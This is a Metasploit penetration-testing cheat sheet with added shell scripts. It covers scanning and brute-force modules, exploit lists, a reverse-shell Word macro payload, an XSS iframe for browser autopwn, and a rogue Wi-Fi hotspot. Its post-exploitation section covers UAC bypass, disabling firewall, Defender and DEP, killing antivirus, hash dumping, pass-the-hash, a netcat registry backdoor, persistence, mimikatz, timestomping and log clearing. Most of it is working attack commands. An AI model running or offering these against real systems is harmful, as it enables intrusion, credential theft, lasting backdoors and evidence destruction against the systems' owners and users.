Metasploit Framework Notes


    Introduction

    Metasploit Framework (MSF) is an integrated penetration-testing framework written in Ruby. It covers most of the work of information gathering, exploitation, privilege escalation and post-exploitation in one place, which is exactly what a framework is for.

    MSF ships with close to 1800 exploit modules collected over the last ten-odd years and 200-plus payloads for the various platforms (roughly; the count is from memory and out of date). Behind msfconsole sits a PostgreSQL database that stores hosts, services, credentials and loot; it listens on the host's port 5432, so first

    service postgresql start

    netstat -ano | grep 5432    to check that it is listening (inside msfconsole, db_status reports the same thing)


    Information gathering

    MSF can drive Nessus, OpenVAS or Nmap to run a vulnerability scan; afterwards the results sit in the database and are viewed with

    creds    collected accounts and passwords

    vulns    vulnerabilities

    loot    dumped hashes and other captured files

    Beyond that, MSF has quite a few scanner modules of its own, all under auxiliary/scanner

    SNMP scanning

    (on a lab target, edit /etc/default/snmpd so that snmpd listens on 0.0.0.0 instead of only on localhost)

    use auxiliary/scanner/snmp/snmp_login    brute-forces community strings

    use auxiliary/scanner/snmp/snmp_enum    the enum modules need a valid community string (COMMUNITY)

    use auxiliary/scanner/snmp/snmp_enumusers

    use auxiliary/scanner/snmp/snmp_enumshares

    SMB scanning

    use auxiliary/scanner/smb/smb_version

    use auxiliary/scanner/smb/smb_enumshares    share enumeration

    use auxiliary/scanner/smb/smb_enumusers    user enumeration

    use auxiliary/scanner/smb/smb_lookupsid    SID enumeration (system user SIDs)

    SSH scanning

    (a banner of SSH-1.x or SSH-1.99 means the server still accepts protocol version 1, which is insecure)

    use auxiliary/scanner/ssh/ssh_login    password brute force

    use auxiliary/scanner/ssh/ssh_login_pubkey    public-key login

    MSSQL scanning

    (TCP 1433 / UDP 1434)

    use auxiliary/scanner/mssql/mssql_ping

    use auxiliary/scanner/mssql/mssql_login

    use auxiliary/admin/mssql/mssql_exec    not a scanner: runs a command through xp_cmdshell and needs valid credentials

    FTP scanning

    use auxiliary/scanner/ftp/ftp_version

    use auxiliary/scanner/ftp/anonymous    checks for anonymous login

    Vulnerability checks

    VNC scanning (port 5900)    use auxiliary/scanner/vnc/

    RDP remote desktop    use auxiliary/scanner/rdp/ms12_020_check

    Device backdoor scanning    use auxiliary/scanner/ssh/juniper_backdoor

    use auxiliary/scanner/ssh/fortinet_backdoor

    HTTP vulnerability scanning

    use auxiliary/scanner/http/dir_listing (also files_dir)   directory listings, files and directories
    use auxiliary/scanner/http/tomcat_mgr_login   Tomcat manager login
    use auxiliary/scanner/http/verb_auth_bypass   HTTP verb authentication bypass
    use auxiliary/scanner/http/wordpress_login_enum   WordPress login brute force
    

    SIP endpoint scanning

    auxiliary/scanner/sip/options
    auxiliary/scanner/sip/enumerator        // VoIP services, IP phones

    auxiliary/voip/sip_invite_spoof         // spoofed call
    exploit/windows/sip/sipxphone_cseq      // exploitation
    

    SCADA systems

    exploit/windows/scada/realwin_scpc_initialize
    

    Scanning via Shodan

    auxiliary/gather/shodan_search    needs a Shodan API key in SHODAN_APIKEY
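As an added example (not from the original notes), the following POSIX shell function writes an msfconsole resource script that chains several of the scanner modules listed above against one target range and finishes with the database views from the information-gathering section. The target range 10.0.0.0/24 and the two wordlist paths are assumed placeholders; USER_FILE, PASS_FILE and STOP_ON_SUCCESS are the real options of ssh_login.

```shell
#!/bin/sh
# Added example, not part of the original notes.
# Builds a resource script for a database-backed msfconsole session:
#   build_scan_rc 10.0.0.0/24 > scan.rc && msfconsole -q -r scan.rc
# Assumptions: 10.0.0.0/24 is a placeholder target range; the wordlist
# paths are the ones Metasploit ships on Kali.

build_scan_rc() {
    rhosts="$1"
    userfile="${2:-/usr/share/metasploit-framework/data/wordlists/unix_users.txt}"
    passfile="${3:-/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt}"

    # setg writes the global datastore, which every module loaded afterwards
    # inherits, so RHOSTS and THREADS are set once for the whole run.
    cat <<EOF
db_status
workspace -a recon
setg RHOSTS $rhosts
setg THREADS 10
use auxiliary/scanner/smb/smb_version
run
use auxiliary/scanner/smb/smb_enumshares
run
use auxiliary/scanner/snmp/snmp_login
run
use auxiliary/scanner/ftp/ftp_version
run
use auxiliary/scanner/ftp/anonymous
run
use auxiliary/scanner/ssh/ssh_login
set USER_FILE $userfile
set PASS_FILE $passfile
set STOP_ON_SUCCESS true
run
hosts
services
creds
EOF
}

# Sanity check before handing the script to msfconsole: every "use" line
# must be matched by a "run", otherwise a module is loaded but never executed.
count_modules() { grep -c '^use ' ; }
count_runs()    { grep -c '^run$' ; }

rc_is_balanced() {
    rc="$(cat)"
    uses=$(printf '%s\n' "$rc" | count_modules)
    runs=$(printf '%s\n' "$rc" | count_runs)
    [ "$uses" -eq "$runs" ]
}

# Print the script for the range given on the command line, if any.
if [ -n "$1" ]; then
    build_scan_rc "$1"
fi
```

The results of every module land in the workspace, so `hosts`, `services` and `creds` at the end show what the run collected; ssh_login stops on the first valid pair per host because of STOP_ON_SUCCESS.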
    

    Exploitation

    After choosing a payload, generate emits the payload code

    generate::

    args
    -b strip bad characters such as '\x00'
    -e choose the encoder
    -i number of encoding iterations
    -t output format such as raw, exe
    -x executable template to embed the payload in
    -f output file name
    -p target platform such as android
    -s NOP sled length in bytes, helps land EIP precisely

    (these are the option letters of the old msfconsole generate command; in msfvenom, -f is the output format and -o the output file)

    Among the payloads is a very powerful in-memory one called Meterpreter

    command
    run/bgrun    run a script in the foreground/background
    clearev    clear the event logs
    download    download a file to the local working directory (lpwd)
    execute -f/H/i    run a program: path / hidden / interactive
    getsystem    escalate to SYSTEM (older versions need load priv first; it is loaded by default now)
    migrate [PID]    migrate into another process
    idletime    show how long the user has been idle
    getuid    show the current user

    Acrobat Reader vulnerabilities

    exploit/windows/fileformat/adobe_utilprintf   Adobe Reader 8.1.2, Windows XP
    exploit/windows/fileformat/adobe_pdf_embedded_exe   Adobe Reader 8.x, 9.x, Windows XP/Vista/7
    exploit/windows/browser/adobe_utilprintf   serves the same bug from a web page
    

    Flash vulnerabilities

    exploit/multi/browser/adobe_flash_hacking_team_uaf
    exploit/multi/browser/adobe_flash_opaque_background_uaf
    

    IE vulnerabilities

    exploit/windows/browser/ms14_064_ole_code_execution
    

    Word vulnerabilities

    exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
    

    JRE vulnerabilities

    exploit/multi/browser/java_jre17_driver_manager
    exploit/multi/browser/java_jre17_jmxbean
    exploit/multi/browser/java_jre17_reflection_types
    

    Word macro payload

    msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -f vba-exe
    // part 1 of the output is the macro code (goes into the VBA editor)
    // part 2 is the payload data, pasted into the document body

    exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
    

    Browser Autopwn

    auxiliary/server/browser_autopwn


    Two ways to get victims to the autopwn server:

    • inject an iframe via XSS: <iframe src="[autopwn URL]" width=0 height=0 style="visibility:hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
    • DNS hijacking

    Fake hotspot man-in-the-middle attack

    airmon-ng start wlan0
    airbase-ng -P -C 30 -e "FREE-CMCC" -v wlan0mon
    ifconfig at0 up 10.0.0.1 netmask 255.255.255.0      // bring up at0
    touch /var/lib/dhcp/dhcpd.leases        // create the DHCP lease file
    dhcpd -cf /etc/dhcp/dhcpd.conf at0      // start the DHCP server
    msfconsole -q -r karma.rc

    // give clients Internet access: enable IP forwarding and NAT them out through eth64
    sysctl -w net.ipv4.ip_forward=1
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    

    Post-exploitation

    Bypassing UAC

    exploit/windows/local/ask
    set FILENAME winupdate.exe      // the user is shown a UAC prompt for this name and has to click Yes

    exploit/windows/local/bypassuac
    exploit/windows/local/bypassuac_injection

    // via registry keys (needs an elevated shell already; EnableLUA=0 only takes effect after a reboot,
    // LocalAccountTokenFilterPolicy=1 turns off remote UAC token filtering so local admins other than RID 500 get a full token over the network)
    cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
    

    Privilege escalation from an existing session

    exploit/windows/local/ms13_053_schlamperei      // Windows 7
    exploit/windows/local/ms13_081_track_popup_menu
    exploit/windows/local/ms13_097_ie_registry_symlink
    exploit/windows/local/ppr_flatten_rec
    

    Graphical payload

    payload/windows/vncinject/reverse_tcp
    

    Hash dump

    meterpreter > load priv
    meterpreter > hashdump
    

    Pass-the-hash login

    exploit/windows/smb/psexec
    set SMBPass [LM hash]:[NT hash]      // the full LM:NT pair as printed by hashdump
    // for local admins other than RID 500, remote UAC filtering has to be off (LocalAccountTokenFilterPolicy=1)
    

    Disabling the firewall

    // needs admin/SYSTEM
    netsh advfirewall set allprofiles state on/off
    net stop windefend
    

    BitLocker disk encryption

    manage-bde -off c:
    manage-bde -status c:
    

    Disabling DEP

    bcdedit.exe /set {current} nx AlwaysOff
    

    Killing antivirus

    run killav
    post/windows/manage/killav
    

    Enabling Remote Desktop

    post/windows/manage/enable_rdp
    run multi_console_command -rc [file]        // enable_rdp writes a cleanup resource file; run it this way to revert the changes

    run getgui -e
    run getgui -u admin -p 123      // add a user and put it in the Remote Desktop Users group
    

    Grabbing system tokens

    load incognito
    list_tokens -u
    impersonate_token 'LAB\\admin'
    execute -f cmd.exe -i -t      // -t runs it with the current (impersonated) token

    exploit/windows/local/ms10_015_kitrap0d
    

    Registry backdoor

    upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32
    reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run     // enumerate
    reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'        // set the value
    reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc       // confirm it took
    

    Opening a firewall port

    execute -f cmd -i -H
    netsh firewall show opmode
    netsh firewall add portopening TCP 444 "test" ENABLE ALL
    shutdown -r -t 0      // reboot so the Run key starts nc
    

    Packet capture

    the sniffer extension keeps captured packets in a ring buffer in the target's memory (nothing is written to its disk) and pulls them back over the encrypted Meterpreter channel

    load sniffer
    sniffer_interfaces
    sniffer_start [id]
    sniffer_dump [id] [file].cap
    

    Parsing the capture

    use auxiliary/sniffer/psnuffle
    set PCAPFILE [file].cap
    

    Cracking weak passwords with John the Ripper

    post/windows/gather/hashdump
    auxiliary/analyze/jtr_crack_fast      // removed in newer versions; use auxiliary/analyze/crack_windows
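As an added example (not from the original notes), the shell below triages hashdump output of the `user:RID:LM:NT:::` form that the Hash Dump, pass-the-hash and John sections all consume: it picks the accounts worth cracking, flags accounts that still carry a real LM hash, and produces the `LM:NT` string that psexec's SMBPass expects. The sample lines are constructed; the hash values are the well-known LM "no hash" marker, the NT hash of the empty password, and the LM and NT hashes of `password`.

```shell
#!/bin/sh
# Added example, not part of the original notes: triage hashdump output
# before cracking or pass-the-hash.
# Constructed sample in pwdump format (user:RID:LM:NT:::). Hash values are
# public constants: aad3b... = LM disabled, 31d6... = NT of "", 8846... = NT
# of "password", e52c... = LM of "password".
SAMPLE_HASHDUMP='Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
bob:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
svc_backup:1002:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::'

EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0
NO_LM=aad3b435b51404eeaad3b435b51404ee

# Accounts whose NT hash is not the empty-password hash: the ones worth
# feeding to john (pwdump lines go in unchanged: john --format=NT hashes.txt).
crackable_accounts() {
    awk -F: -v e="$EMPTY_NT" 'NF >= 4 && tolower($4) != e { print $1 }'
}

# Accounts that still store a real LM hash (LM is case-insensitive, split
# into two 7-byte halves, and falls in minutes: john --format=LM).
lm_accounts() {
    awk -F: -v n="$NO_LM" 'NF >= 4 && tolower($3) != n { print $1 }'
}

# SMBPass value for exploit/windows/smb/psexec: "LM:NT" for the named user.
psexec_smbpass() {
    awk -F: -v u="$1" '$1 == u { print $3 ":" $4; exit }'
}

# Demo run on the constructed sample.
printf '%s\n' "$SAMPLE_HASHDUMP" | crackable_accounts
printf '%s\n' "$SAMPLE_HASHDUMP" | lm_accounts
printf '%s\n' "$SAMPLE_HASHDUMP" | psexec_smbpass bob
```

The filters read stdin, so real data is piped in from the file that hashdump or post/windows/gather/hashdump wrote to loot. Accounts with the empty-password NT hash are disabled or never had a password set and only waste cracking time; an LM hash that is not the marker value means the old LM storage is still on and that account's password is recoverable almost immediately.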
    

    Changing file-system MAC times

    M: Modified

    A: Accessed

    C: Changed (inode/metadata change)

    on Linux, touch changes A and M (C is set by the kernel and cannot be written from user space)

    timestomp 1.txt -v      // show the current times
    timestomp 1.txt -f c:\\2.txt      // copy the times from a template file
    timestomp 1.txt -z "MM/DD/YYYY HH24:MI:SS"      // set all four at once
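As an added example (not from the original notes), the shell below reproduces the timestomp "copy from a template" step with GNU touch and stat on Linux, and shows the check a forensic analyst makes against it: after the stomp, the file's A and M times equal the template's, but its C time is the moment of the tampering, because ctime is maintained by the kernel and no user-space call sets it. The file names 1.txt and 2.txt follow the notes above; the dates are constructed.

```shell
#!/bin/sh
# Added example, not part of the original notes. Requires GNU touch, stat
# and date (Linux). Creates a temp dir with a backdated template (2.txt),
# copies its A/M times onto a target (1.txt), and prints the dir path so
# callers can inspect the result.
setup_mac_demo() {
    d=$(mktemp -d)
    printf 'template\n' > "$d/2.txt"
    touch -d '2020-01-02 03:04:05' "$d/2.txt"     # backdate the template (constructed date)
    printf 'evidence\n' > "$d/1.txt"
    touch -r "$d/2.txt" "$d/1.txt"                # like: timestomp 1.txt -f 2.txt
    printf '%s\n' "$d"
}

mtime() { stat -c %Y "$1" ; }   # M: last content write
atime() { stat -c %X "$1" ; }   # A: last read
ctime() { stat -c %Z "$1" ; }   # C: last inode change, kernel-controlled

# Forensic heuristic: a normal write sets M and C together, so a C newer
# than M means the metadata was rewritten after the supposed last write.
ctime_mismatch() {
    m=$(mtime "$1"); c=$(ctime "$1")
    if [ "$c" -gt "$m" ]; then echo yes; else echo no; fi
}

show_mac() {
    printf '%s  M=%s  A=%s  C=%s  ctime_mismatch=%s\n' "$1" \
        "$(date -d "@$(mtime "$1")" '+%F %T')" \
        "$(date -d "@$(atime "$1")" '+%F %T')" \
        "$(date -d "@$(ctime "$1")" '+%F %T')" \
        "$(ctime_mismatch "$1")"
}

# Demo run: the stomped file carries the template's 2020 A/M times but a
# present-day C time, which is the tell.
demo_dir=$(setup_mac_demo)
show_mac "$demo_dir/1.txt"
show_mac "$demo_dir/2.txt"
rm -rf "$demo_dir"
```

The same limitation shows up on Windows in a different place: timestomp rewrites the $STANDARD_INFORMATION timestamps that Explorer and stat-style tools display, while the $FILE_NAME attribute keeps its original values, and comparing the two is the standard check for stomped files.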
    

    Route pivoting

    once a shell is obtained, add a route through it and scan the internal network

    run autoroute -s 1.1.1.0/24
    run autoroute -p    // list the routes added (newer versions: post/multi/manage/autoroute)


    Scanning the internal network

    auxiliary/scanner/portscan/tcp

    Port forwarding

    once a shell is obtained

    meterpreter > portfwd add -L [local ip] -l [local port] -r [remote ip] -p [remote port]
    meterpreter > portfwd list / delete / flush
    

    Post modules

    post/windows/gather/arp_scanner

    post/windows/gather/checkvm         // is the host a VM

    post/windows/gather/credentials/credential_collector        // local accounts and hashes

    post/windows/gather/enum_applications       // installed applications

    post/windows/gather/enum_logged_on_users        // currently logged-on users

    post/multi/recon/local_exploit_suggester        // local privilege-escalation candidates

    post/windows/manage/delete_user     // delete a user

    post/multi/gather/env       // environment information

    post/multi/gather/firefox_creds     // credentials saved in Firefox

    post/multi/gather/ssh_creds         // SSH keys

    post/multi/gather/check_malware     // malware check
    

    Persistent backdoor

    run metsvc -A
    use exploit/multi/handler
    set payload windows/metsvc_bind_tcp

    run persistence -h
                    -X start at boot
                    -r [ip] attacker address to connect back to
                    -i reconnect interval in seconds
    (both scripts are deprecated; newer versions use exploit/windows/local/persistence)
    
    

    mimikatz passwords

    getsystem
    load mimikatz      // deprecated in favour of load kiwi
    kerberos / wdigest / msv / ssp      // the credential-provider commands
    mimikatz_command -f a::         // a nonexistent module name makes mimikatz list the available modules
                     samdump::
                     handle::
    

    Covering tracks

    run event_manager -i    show the logs
                      -c    clear them

    clearev
    

    Phishing from a session

    post/windows/manage/inject_host     // hosts-file injection
    post/windows/gather/phish_login_pass        // phishing for the login password